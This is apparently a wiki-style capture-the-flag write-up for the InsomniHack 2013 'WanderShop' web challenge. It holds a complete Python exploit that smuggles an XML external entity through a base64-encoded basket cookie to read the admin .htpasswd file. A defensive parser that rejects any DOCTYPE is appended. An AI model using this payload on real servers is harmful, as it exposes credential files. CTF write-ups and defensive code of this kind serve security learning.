InsomniHack-2013/Web2/WanderShop

462 bytes added, 11:02, 26 March 2013
>slamas (admin)
* The flag is in the admin page
 
* Complete script
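<pre>
#!/usr/bin/env python3

import base64
import urllib.parse

import requests

url = 'http://web02.insomni.hack/1a5b4e6f811a0bc0dcb8fdd773bdb51c571be4e6/'

# Basket document whose DOCTYPE declares an external entity pointing at
# admin/.htpasswd, so that &item; resolves to that file's contents when
# the server parses the basket.
payload = '''
<!DOCTYPE basket
[
<!ENTITY item SYSTEM "admin/.htpasswd">
]>
<basket>
<item type="5" name="asd">&item;</item>
</basket>
'''

# The basket cookie carries the XML base64-encoded, then URL-quoted.
payload = urllib.parse.quote(base64.encodebytes(payload.encode()))

cookie = {'basket': payload}
r = requests.get(url + 'checkout.php', cookies=cookie)
print(r.text)
</pre>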
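A server-side check for this class of input, as an added example that is not part of the original write-up or of the challenge's code: it decodes the `basket` cookie the way the script above encodes it and rejects any document that carries a DOCTYPE. The names `parse_basket_cookie`, `encode_basket`, `UnsafeBasket` and the 4096-character limit are assumptions made for the illustration.

```python
import base64
import urllib.parse
import xml.parsers.expat


class UnsafeBasket(ValueError):
    """The basket cookie was rejected."""


def encode_basket(xml_text):
    # Same encoding as the script above: base64, then URL-quoting.
    return urllib.parse.quote(base64.encodebytes(xml_text.encode()))


def parse_basket_cookie(raw_cookie, max_len=4096):
    """Return the <item> entries of a basket cookie, refusing any DOCTYPE."""
    if len(raw_cookie) > max_len:
        raise UnsafeBasket("cookie too large")
    try:
        xml_bytes = base64.b64decode(urllib.parse.unquote(raw_cookie))
    except ValueError as exc:  # binascii.Error subclasses ValueError
        raise UnsafeBasket("cookie is not valid base64") from exc
    items, open_item = [], []

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        # Without a DOCTYPE no entity, internal or SYSTEM, can be declared.
        raise UnsafeBasket("DOCTYPE not allowed in basket")

    def start(name, attrs):
        if name == "item":
            open_item.append({"type": attrs.get("type"), "name": attrs.get("name"), "text": ""})

    def chars(data):
        if open_item:
            open_item[-1]["text"] += data

    def end(name):
        if name == "item":
            items.append(open_item.pop())

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.StartElementHandler, parser.EndElementHandler = start, end
    parser.CharacterDataHandler = chars
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError as exc:
        raise UnsafeBasket("malformed basket XML") from exc
    return items

# Constructed sample: a benign basket in the cookie's wire format.
SAMPLE_COOKIE = encode_basket('<basket><item type="5" name="asd">2</item></basket>')
```

Raising from the DOCTYPE handler aborts parsing before any entity declaration is processed, so the rejection does not depend on how the parser is configured to resolve external entities.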